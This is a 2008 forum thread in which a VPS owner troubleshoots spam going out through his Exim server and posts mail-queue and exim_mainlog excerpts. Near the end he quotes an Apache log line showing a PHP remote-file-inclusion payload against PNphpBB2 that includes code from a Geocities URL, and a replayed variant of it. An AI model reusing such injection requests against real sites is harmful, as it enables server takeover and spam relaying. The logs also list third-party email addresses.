my mail system is being exploited

Hi.

My mail system is being exploited to send spam.

here is a tipical header of a spam sent:
1JXcwB-0005Ar-CJ-H
nobody 99 99
<nobody@machinenumber.mydomain.tld>
1204897719 0
-ident nobody
-received_protocol local
-body_linecount 49
-max_received_linelength 97
-auth_id nobody
-auth_sender nobody@machinenumber.mydomain.tld
-allow_unqualified_recipient
-allow_unqualified_sender
-deliver_firsttime
-local
XX


As of now, only smtp auth'd people (3 only) send via this server. Plus the php mailer.

But with the volume that is going out, there must be an exploit of some kind.

There must be somewhere I can look (logs) to find my information. Where is it? What is it named?

I need help. Please. My service provider doesn't seem to know about this situation and always tells me I am on VPS and that it's my problem.

Any help?

MArc

 

I found in /var/log/exim_mainlog this:

2008-03-07 08:05:46 1JXdCi-0004Zx-Rm ** root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: retry timeout exceeded
2008-03-07 08:05:46 1JXdCi-0004Za-98 Completed
2008-03-07 08:05:46 1JXdCi-0004Zx-Rm root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: error ignored
2008-03-07 08:05:46 1JXdCh-0004ZN-Kf User 0 set for local_delivery transport is on the never_users list
2008-03-07 08:05:46 1JXdCh-0004ZN-Kf == root@myserver.mydomain.tld <nobody@myserver.mydomain.tld> R=localuser T=local_delivery defer (-29): User 0 set for local_delivery transport is on the never_users list
2008-03-07 08:05:46 1JXdCh-0004ZN-Kf ** root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: retry timeout exceeded
2008-03-07 08:05:46 1JXdCh-0004ZN-Kf root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: error ignored
2008-03-07 08:05:46 1JXdCk-0004aX-OZ <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
2008-03-07 08:05:46 1JXdCh-0004ZN-Kf Completed
2008-03-07 08:05:46 1JXdCi-0004Zp-II Completed
2008-03-07 08:05:46 1JXdCi-0004Zx-Rm Completed
2008-03-07 08:05:46 1JXdCk-0004aT-Iy <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
2008-03-07 08:05:47 1JXdCl-0004an-1j <= nobody@myserver.mydomain.tld U=nobody P=local S=1944
2008-03-07 08:05:47 1JXdCi-0004Zu-PC => ciani79@hotmail.com R=lookuphost T=remote_smtp H=mx3.hotmail.com [65.54.245.72]
2008-03-07 08:05:47 1JXdCi-0004Zu-PC Completed
2008-03-07 08:05:47 1JXdCj-0004a9-LU => dave@daveconte.com R=lookuphost T=remote_smtp H=smtp.where.secureserver.net [208.109.80.149]
2008-03-07 08:05:47 1JXdCj-0004a9-LU Completed
2008-03-07 08:05:47 1JXdCl-0004at-8M <= nobody@myserver.mydomain.tld U=nobody P=local S=1952
2008-03-07 08:05:47 1JXdCj-0004aC-Pd => cibbs04@aol.com R=lookuphost T=remote_smtp H=mailin-02.mx.aol.com [64.12.137.89]
2008-03-07 08:05:47 1JXdCk-0004aL-5D Remote host server30.appriver.com [69.20.116.115] closed connection in response to initial connection
2008-03-07 08:05:47 1JXdCj-0004aC-Pd Completed
2008-03-07 08:05:47 1JXdCl-0004ar-9x <= nobody@myserver.mydomain.tld U=nobody P=local S=1934
2008-03-07 08:05:47 1JXdCl-0004ax-Dh <= nobody@myserver.mydomain.tld U=nobody P=local S=1948
2008-03-07 08:05:47 1JXdCk-0004aV-EW => cin37@hotmail.com R=lookuphost T=remote_smtp H=mx2.hotmail.com [65.54.245.40]
2008-03-07 08:05:47 1JXdCk-0004aV-EW Completed
2008-03-07 08:05:47 1JXdCk-0004aX-OZ ** cin_tom@hotmail.com R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<cin_tom@hotmail.com>: host mx4.hotmail.com [65.54.244.232]: 550 Requested action not taken: mailbox unavailable
2008-03-07 08:05:47 1JXdCi-0004ZY-Ct => dave@albertbros.com R=lookuphost T=remote_smtp H=mail.albertbros.com [75.145.248.105]
2008-03-07 08:05:47 1JXdCi-0004ZY-Ct Completed
2008-03-07 08:05:47 1JXdCl-0004b3-Nk <= nobody@myserver.mydomain.tld U=nobody P=local S=1958
2008-03-07 08:05:47 1JXdCl-0004an-1j ** cinbad122968@aol.com R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<cinbad122968@aol.com>: host mailin-02.mx.aol.com [64.12.137.89]: 550 We would love to have gotten this email to cinbad122968@aim.com. But, your recipient never logged onto their free AIM Mail account. Please contact them and let them know that they're missing out on all the super features offered by AIM Mail. And by the way, they're also missing out on your email. Thanks.


but this in no way tells me where these are coming from.

Marc

 

follow up:
Ratelimit: incoming SMTP connections that do not send QUIT, have recently matched an RBL, or have attacked the server. is checked

Add sender rates to the mail log [?] is checked

no rate seems to be enforced unless this problem is caused by a spammer sending quits.

Still in the dark.

Marc

 

Just did...

I found out many of these

127.0.0.1 - - [07/Mar/2008:09:38:13 -0600] "GET /?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php%3fp=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5ba%5d),exit.%2527&a=http://www.geocities.com/d_e_d_d000000f%3f HTTP/1.1" 200 3473

But that doesn't tell me anything about my problem, except telling me I have a problem.

I did go to http://www.geocities.com/d_e_d_d_0000000000/id.txt indicated in the url and there is a php script overthere.

now, I did try that url:
http://www.mydomain.tld/?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php%253fp=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%252527.include($_GET%255ba%255d),exit.%252527&a=http://www.geocities.com/d_e_d_d_i.3721/id.txt%253f%253f

and it gives me the page it should give me...

So there must be some kind of alias somewhere in some table of http that executes code with this command while showing the webpage.

Any more help with this?

Regards.

Marc